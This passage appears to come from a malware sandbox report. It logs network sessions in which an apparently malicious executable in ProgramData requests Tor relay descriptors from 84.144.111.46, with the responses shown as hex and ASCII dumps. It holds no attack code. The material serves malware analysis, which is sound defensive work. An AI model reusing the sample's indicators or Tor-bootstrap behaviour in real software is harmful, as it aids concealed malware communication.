2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 31 20 30 31 3a 31 34 3a 34 37 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 34 35 42 43 20 39 39 31 37 20 46 37 45 31 20 33 37 37 30 20 37 33 36 42 20 42 46 46 43 20 32 32 45 36 20 46 31 37 30 20 45 31 34 45 20 31 36 45 43 0a 75 70 74 69 6d 65 20 31 32 39 37 39 34 0a 62 61 6e 64 77 69 64 74 68 20 32 30 34 38 30 30 30 20 34 30 39 36 30 30 30 20 32 33 35 34 36 36 32 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 44 35 35 35 45 35 42 33 38 32 30 38 46 33 42 35 34 43 39 34 36 36 33 42 44 41 34 42 42 41 39 45 41 34 36 38 38 39 35 33 20 46 6b 7a 77 47 61 56 66 32 64 33 57 75 4a 35 31 35 38 67 47 47 5a 38 49 46 6e 37 38 30 6c 70 48 34 55 42 48 47 51 52 6c 79 4b 6f 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 59 39 51 49 68 2f 79 69 58 64 4a 51 31 79 51 58 64 6a 53 6f 6e 68 54 6b 6a 41 67 58 4d 34 58 7a 6e 38 75 78 77 79 44 73 4e 7a 65 57 6a 31 54 5a 45 54 36 5a 57 5a 0a 6c 32 47 52 4b 41 4e 46 77 46 53 56 52 49 63 6d 69 34 33 75 75 63 54 69 43 7a 48 31 65 72 53 72 57 30 6b 52 4a 62 65 62 4a 65 4a 68 43 35 77 69 74 51 52 76 4a 49 63 6b 75 79 49 4f 74 37 30 64 0a 43 68 76 31 36 6b 77 55 4a 4d 69 63 7a 79 44 70 59 2f 77 37 5a 6c 32 76 43 6c 6a 59 69 6e 79 33 73 4b 57 42 70 58 41 35 5a 41 61 2b 79 4e 75 70 67 42 6e 35 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 42 46 39 45 44 68 4c 53
                          Data Ascii: router GalaxyNewsRadio 84.62.245.6 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxUxAVbs1PI0VDEFUz55fRfxh+7MGNrA5t5aN3IesGfsUqxQAQAgBABBQHKwM8IGgQ9dK2R4NMgzsLz/onx3FQItuxRviMt6HWhSKcoj6ewElNnaP4YoESMzdmvsKUrrzYeLejw33pUH8qKCproA73Xm+dRyD8S2r6+FSrkvCwUuxtAkPA51bQU=-----END ED25519 CERT-----master-key-ed25519 QUBysDPCBoEPXStkeDTIM7C8/6J8dxUCLbsUb4jLeh0platform Tor 0.4.7.10 on OpenBSDproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-11 01:14:47fingerprint 45BC 9917 F7E1 3770 736B BFFC 22E6 F170 E14E 16ECuptime 129794bandwidth 2048000 4096000 2354662extra-info-digest D555E5B38208F3B54C94663BDA4BBA9EA4688953 FkzwGaVf2d3WuJ5158gGGZ8IFn780lpH4UBHGQRlyKoonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBALY9QIh/yiXdJQ1yQXdjSonhTkjAgXM4Xzn8uxwyDsNzeWj1TZET6ZWZl2GRKANFwFSVRIcmi43uucTiCzH1erSrW0kRJbebJeJhC5witQRvJIckuyIOt70dChv16kwUJMiczyDpY/w7Zl2vCljYiny3sKWBpXA5ZAa+yNupgBn5AgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBALBF9EDhLS


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          42192.168.2.34974784.144.111.469031C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:43.471806049 CET7858OUTGET /tor/server/fp/38e73023a9792cdb8adcd4d1b2a220effe8d8ff5 HTTP/1.0
                          Host: 84.144.111.46
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:43.516797066 CET7860INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:29 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:26:29 GMT
                          Data Raw: 72 6f 75 74 65 72 20 61 6c 70 68 61 31 33 37 20 37 30 2e 33 34 2e 31 39 34 2e 31 38 39 20 34 34 33 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 5a 56 41 56 54 66 5a 64 74 58 6d 6f 41 30 49 39 55 38 77 78 48 49 64 5a 33 69 63 68 55 7a 74 2f 70 35 4c 50 33 72 53 6a 72 55 71 2f 61 73 41 51 41 67 42 41 43 2b 6f 61 2f 75 0a 50 51 33 57 34 4f 48 6b 49 76 37 79 2f 2f 52 32 7a 6f 36 39 44 37 6b 4f 74 67 42 43 55 77 33 73 50 65 66 55 70 2b 52 31 66 65 33 78 2b 69 65 46 49 46 66 2b 67 78 4f 75 6c 74 57 63 45 55 61 41 0a 77 53 56 42 78 69 6f 55 47 77 71 33 35 32 4d 63 79 76 65 33 67 58 50 43 56 32 73 37 61 53 77 50 61 79 57 6a 68 72 47 57 52 78 78 2f 76 54 61 50 6e 46 63 62 55 56 66 4a 66 67 67 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 76 71 47 76 37 6a 30 4e 31 75 44 68 35 43 4c 2b 38 76 2f 30 64 73 36 4f 76 51 2b 35 44 72 59 41 51 6c 4d 4e 37 44 33 6e 31 4b 63 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 61 30 35 3a 66 34 38 30 3a 32 30 30 30 3a 32 66 66 64 3a 35 34 30 30 3a 34 66 66 3a 66 65 32 37 3a 62 34 34 62 5d 3a 34 34 33 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 31 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 31 20 30 33 3a 35 32 3a 31 34 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 33 38 45 37 20 33 30 32 33 20 41 39 37 39 20 32 43 44 42 20 38 41 44 43 20 44 34 44 31 20 42 32 41 32 20 32 30 45 46 20 46 45 38 44 20 38 46 46 35 0a 75 70 74 69 6d 65 20 36 34 38 30 35 35 0a 62 61 6e 64 77 69 64 74 68 20 32 38 36 37 32 30 30 20 36 31 34 34 30 30 30 20 33 30 35 37 34 30 38 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 35 45 36 33 34 39 43 35 46 32 34 35 35 34 45 44 39 43 42 38 34 31 42 42 39 44 39 32 31 46 32 41 33 39 30 30 36 43 32 42 20 75 50 69 59 50 77 6f 66 33 51 4c 47 2f 6c 46 4d 59 5a 79 5a 45 47 75 57 75 6f 52 57 57 34 74 43 41 66 6b 2b 49 47 38 55 41 50 51 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4d 58 4b 46 6c 67 30 44 33 62 6a 71 73 41 43 44 34 78 77 41 54 35 59 43 78 78 65 42 4c 54 31 4f 49 73 42 7a 66 32 79 50 42 69 44 37 33 33 64 48 41 36 71 42 75 51 70 0a 67 77 61 6e 2f 42 75 4e 61 71 30 6b 74 39 71 35 30 58 39 36 42 42 58 30 6c 37 73 6c 37 6a 61 70 78 39 2f 50 76 67 64 4d 30 2b 59 74 4f 55 74 48 61 71 4c 41 35 79 68 50 66 52 42 48 58 2b 31 4e 0a 4d 65 2b 6b 59 51 69 46 74 64 44 55 57 49 49 7a 4c 74 49 6f 74 44 34 77 67 4b 4a 4c 6d 66 36 4c 6b 53 4e 63 38 47 53 66 54 5a 4b 32 70 74 53 52 36 4f 6d 6e 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d
                          Data Ascii: router alpha137 70.34.194.189 443 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxZVAVTfZdtXmoA0I9U8wxHIdZ3ichUzt/p5LP3rSjrUq/asAQAgBAC+oa/uPQ3W4OHkIv7y//R2zo69D7kOtgBCUw3sPefUp+R1fe3x+ieFIFf+gxOultWcEUaAwSVBxioUGwq352Mcyve3gXPCV2s7aSwPayWjhrGWRxx/vTaPnFcbUVfJfgg=-----END ED25519 CERT-----master-key-ed25519 vqGv7j0N1uDh5CL+8v/0ds6OvQ+5DrYAQlMN7D3n1Kcor-address [2a05:f480:2000:2ffd:5400:4ff:fe27:b44b]:443platform Tor 0.4.7.11 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-11 03:52:14fingerprint 38E7 3023 A979 2CDB 8ADC D4D1 B2A2 20EF FE8D 8FF5uptime 648055bandwidth 2867200 6144000 3057408extra-info-digest 5E6349C5F24554ED9CB841BB9D921F2A39006C2B uPiYPwof3QLG/lFMYZyZEGuWuoRWW4tCAfk+IG8UAPQonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAMXKFlg0D3bjqsACD4xwAT5YCxxeBLT1OIsBzf2yPBiD733dHA6qBuQpgwan/BuNaq0kt9q50X96BBX0l7sl7japx9/PvgdM0+YtOUtHaqLA5yhPfRBHX+1NMe+kYQiFtdDUWIIzLtIotD4wgKJLmf6LkSNc8GSfTZK2ptSR6OmnAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          43192.168.2.34974884.144.111.469031C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:43.868915081 CET7866OUTGET /tor/server/fp/45bc9917f7e13770736bbffc22e6f170e14e16ec HTTP/1.0
                          Host: 84.144.111.46
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:43.934664965 CET7867INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:29 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:26:29 GMT
                          Data Raw: 72 6f 75 74 65 72 20 47 61 6c 61 78 79 4e 65 77 73 52 61 64 69 6f 20 38 34 2e 36 32 2e 32 34 35 2e 36 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 55 78 41 56 62 73 31 50 49 30 56 44 45 46 55 7a 35 35 66 52 66 78 68 2b 37 4d 47 4e 72 41 35 74 35 61 4e 33 49 65 73 47 66 73 55 71 78 51 41 51 41 67 42 41 42 42 51 48 4b 77 0a 4d 38 49 47 67 51 39 64 4b 32 52 34 4e 4d 67 7a 73 4c 7a 2f 6f 6e 78 33 46 51 49 74 75 78 52 76 69 4d 74 36 48 57 68 53 4b 63 6f 6a 36 65 77 45 6c 4e 6e 61 50 34 59 6f 45 53 4d 7a 64 6d 76 73 0a 4b 55 72 72 7a 59 65 4c 65 6a 77 33 33 70 55 48 38 71 4b 43 70 72 6f 41 37 33 58 6d 2b 64 52 79 44 38 53 32 72 36 2b 46 53 72 6b 76 43 77 55 75 78 74 41 6b 50 41 35 31 62 51 55 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 51 55 42 79 73 44 50 43 42 6f 45 50 58 53 74 6b 65 44 54 49 4d 37 43 38 2f 36 4a 38 64 78 55 43 4c 62 73 55 62 34 6a 4c 65 68 30 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 30 20 6f 6e 20 4f 70 65 6e 42 53 44 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 31 20 30 31 3a 31 34 3a 34 37 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 34 35 42 43 20 39 39 31 37 20 46 37 45 31 20 33 37 37 30 20 37 33 36 42 20 42 46 46 43 20 32 32 45 36 20 46 31 37 30 20 45 31 34 45 20 31 36 45 43 0a 75 70 74 69 6d 65 20 31 32 39 37 39 34 0a 62 61 6e 64 77 69 64 74 68 20 32 30 34 38 30 30 30 20 34 30 39 36 30 30 30 20 32 33 35 34 36 36 32 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 44 35 35 35 45 35 42 33 38 32 30 38 46 33 42 35 34 43 39 34 36 36 33 42 44 41 34 42 42 41 39 45 41 34 36 38 38 39 35 33 20 46 6b 7a 77 47 61 56 66 32 64 33 57 75 4a 35 31 35 38 67 47 47 5a 38 49 46 6e 37 38 30 6c 70 48 34 55 42 48 47 51 52 6c 79 4b 6f 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 59 39 51 49 68 2f 79 69 58 64 4a 51 31 79 51 58 64 6a 53 6f 6e 68 54 6b 6a 41 67 58 4d 34 58 7a 6e 38 75 78 77 79 44 73 4e 7a 65 57 6a 31 54 5a 45 54 36 5a 57 5a 0a 6c 32 47 52 4b 41 4e 46 77 46 53 56 52 49 63 6d 69 34 33 75 75 63 54 69 43 7a 48 31 65 72 53 72 57 30 6b 52 4a 62 65 62 4a 65 4a 68 43 35 77 69 74 51 52 76 4a 49 63 6b 75 79 49 4f 74 37 30 64 0a 43 68 76 31 36 6b 77 55 4a 4d 69 63 7a 79 44 70 59 2f 77 37 5a 6c 32 76 43 6c 6a 59 69 6e 79 33 73 4b 57 42 70 58 41 35 5a 41 61 2b 79 4e 75 70 67 42 6e 35 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 42 46 39 45 44 68 4c 53
                          Data Ascii: router GalaxyNewsRadio 84.62.245.6 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxUxAVbs1PI0VDEFUz55fRfxh+7MGNrA5t5aN3IesGfsUqxQAQAgBABBQHKwM8IGgQ9dK2R4NMgzsLz/onx3FQItuxRviMt6HWhSKcoj6ewElNnaP4YoESMzdmvsKUrrzYeLejw33pUH8qKCproA73Xm+dRyD8S2r6+FSrkvCwUuxtAkPA51bQU=-----END ED25519 CERT-----master-key-ed25519 QUBysDPCBoEPXStkeDTIM7C8/6J8dxUCLbsUb4jLeh0platform Tor 0.4.7.10 on OpenBSDproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-11 01:14:47fingerprint 45BC 9917 F7E1 3770 736B BFFC 22E6 F170 E14E 16ECuptime 129794bandwidth 2048000 4096000 2354662extra-info-digest D555E5B38208F3B54C94663BDA4BBA9EA4688953 FkzwGaVf2d3WuJ5158gGGZ8IFn780lpH4UBHGQRlyKoonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBALY9QIh/yiXdJQ1yQXdjSonhTkjAgXM4Xzn8uxwyDsNzeWj1TZET6ZWZl2GRKANFwFSVRIcmi43uucTiCzH1erSrW0kRJbebJeJhC5witQRvJIckuyIOt70dChv16kwUJMiczyDpY/w7Zl2vCljYiny3sKWBpXA5ZAa+yNupgBn5AgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBALBF9EDhLS


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          44192.168.2.34974984.144.111.469031C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:44.069683075 CET7871OUTGET /tor/server/fp/02a8ccb1fb70984226231283596da734a80e3f6f HTTP/1.0
                          Host: 84.144.111.46
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:44.120121956 CET7872INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:29 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:26:29 GMT
                          Data Raw: 72 6f 75 74 65 72 20 6f 6e 69 6f 6e 44 41 4f 72 65 6c 30 61 64 65 64 31 20 35 2e 32 2e 37 39 2e 31 39 30 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 56 74 41 5a 7a 70 74 41 56 55 39 5a 46 59 38 55 37 64 6e 6a 70 51 52 55 6d 73 47 42 7a 44 56 69 46 2b 79 64 6b 42 58 74 6a 51 52 4e 2f 6b 41 51 41 67 42 41 44 55 75 45 66 41 0a 42 5a 4f 6a 31 6c 65 6c 33 7a 42 72 50 64 74 76 66 72 45 59 32 51 77 6d 56 31 63 34 48 6b 42 56 6f 68 68 54 33 74 68 56 65 31 69 68 59 59 79 64 79 61 72 44 73 31 42 79 54 52 74 63 74 75 38 73 0a 43 69 59 6b 6c 43 52 33 63 4c 48 46 37 6c 44 34 6d 31 6e 6c 4e 70 45 30 7a 6d 78 6b 76 38 48 45 4a 4e 46 6d 32 56 6f 77 74 43 59 69 32 78 67 47 50 4a 6b 70 73 39 69 58 49 41 34 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 31 4c 68 48 77 41 57 54 6f 39 5a 58 70 64 38 77 61 7a 33 62 62 33 36 78 47 4e 6b 4d 4a 6c 64 58 4f 42 35 41 56 61 49 59 55 39 34 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 31 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 31 20 30 30 3a 32 32 3a 34 33 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 30 32 41 38 20 43 43 42 31 20 46 42 37 30 20 39 38 34 32 20 32 36 32 33 20 31 32 38 33 20 35 39 36 44 20 41 37 33 34 20 41 38 30 45 20 33 46 36 46 0a 75 70 74 69 6d 65 20 32 34 30 31 32 31 34 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 32 33 33 30 38 36 37 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 33 39 33 31 35 37 36 38 39 34 32 36 30 32 43 37 43 34 36 33 34 46 41 30 43 39 33 44 32 43 39 35 30 41 39 45 44 38 30 38 20 6e 33 38 6a 72 6a 50 66 35 48 38 67 6c 64 4e 46 66 72 2b 41 75 34 4e 7a 33 65 33 36 32 55 74 42 63 4a 50 7a 6e 4c 43 56 76 73 49 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4b 68 64 30 51 51 51 36 53 61 57 52 6b 4f 6f 52 76 35 76 54 45 68 2b 4f 63 73 36 4d 75 67 4b 58 59 75 68 69 70 70 77 39 64 76 74 48 7a 46 6f 2b 43 73 6e 67 38 36 4e 0a 78 62 6c 6c 77 45 4a 65 39 2b 71 4f 55 44 2b 56 43 39 2b 67 79 7a 6c 2b 71 44 79 6e 6e 51 33 38 77 71 31 66 4e 6a 48 54 36 36 64 63 51 4e 68 57 54 76 78 38 54 30 66 42 53 44 75 6e 73 64 2f 32 0a 2b 45 35 75 41 72 64 48 33 53 6f 37 56 52 48 56 65 58 2b 57 58 71 47 56 64 69 57 64 46 76 43 4e 76 4d 42 6e 6d 5a 54 50 72 72 36 75 37 4a 39 53 37 51 35 50 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 38 48
                          Data Ascii: router onionDAOrel0aded1 5.2.79.190 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxVtAZzptAVU9ZFY8U7dnjpQRUmsGBzDViF+ydkBXtjQRN/kAQAgBADUuEfABZOj1lel3zBrPdtvfrEY2QwmV1c4HkBVohhT3thVe1ihYYydyarDs1ByTRtctu8sCiYklCR3cLHF7lD4m1nlNpE0zmxkv8HEJNFm2VowtCYi2xgGPJkps9iXIA4=-----END ED25519 CERT-----master-key-ed25519 1LhHwAWTo9ZXpd8waz3bb36xGNkMJldXOB5AVaIYU94platform Tor 0.4.7.11 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-11 00:22:43fingerprint 02A8 CCB1 FB70 9842 2623 1283 596D A734 A80E 3F6Fuptime 2401214bandwidth 1073741824 1073741824 2330867extra-info-digest 39315768942602C7C4634FA0C93D2C950A9ED808 n38jrjPf5H8gldNFfr+Au4Nz3e362UtBcJPznLCVvsIonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAKhd0QQQ6SaWRkOoRv5vTEh+Ocs6MugKXYuhippw9dvtHzFo+Csng86NxbllwEJe9+qOUD+VC9+gyzl+qDynnQ38wq1fNjHT66dcQNhWTvx8T0fBSDunsd/2+E5uArdH3So7VRHVeX+WXqGVdiWdFvCNvMBnmZTPrr6u7J9S7Q5PAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAL8H


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          45192.168.2.34975084.144.111.469031C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:26:44.431454897 CET7880OUTGET /tor/server/fp/45bc9917f7e13770736bbffc22e6f170e14e16ec HTTP/1.0
                          Host: 84.144.111.46
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:26:44.485508919 CET7882INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:26:30 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:26:30 GMT
                          Data Raw: 72 6f 75 74 65 72 20 47 61 6c 61 78 79 4e 65 77 73 52 61 64 69 6f 20 38 34 2e 36 32 2e 32 34 35 2e 36 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 55 78 41 56 62 73 31 50 49 30 56 44 45 46 55 7a 35 35 66 52 66 78 68 2b 37 4d 47 4e 72 41 35 74 35 61 4e 33 49 65 73 47 66 73 55 71 78 51 41 51 41 67 42 41 42 42 51 48 4b 77 0a 4d 38 49 47 67 51 39 64 4b 32 52 34 4e 4d 67 7a 73 4c 7a 2f 6f 6e 78 33 46 51 49 74 75 78 52 76 69 4d 74 36 48 57 68 53 4b 63 6f 6a 36 65 77 45 6c 4e 6e 61 50 34 59 6f 45 53 4d 7a 64 6d 76 73 0a 4b 55 72 72 7a 59 65 4c 65 6a 77 33 33 70 55 48 38 71 4b 43 70 72 6f 41 37 33 58 6d 2b 64 52 79 44 38 53 32 72 36 2b 46 53 72 6b 76 43 77 55 75 78 74 41 6b 50 41 35 31 62 51 55 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 51 55 42 79 73 44 50 43 42 6f 45 50 58 53 74 6b 65 44 54 49 4d 37 43 38 2f 36 4a 38 64 78 55 43 4c 62 73 55 62 34 6a 4c 65 68 30 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 30 20 6f 6e 20 4f 70 65 6e 42 53 44 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 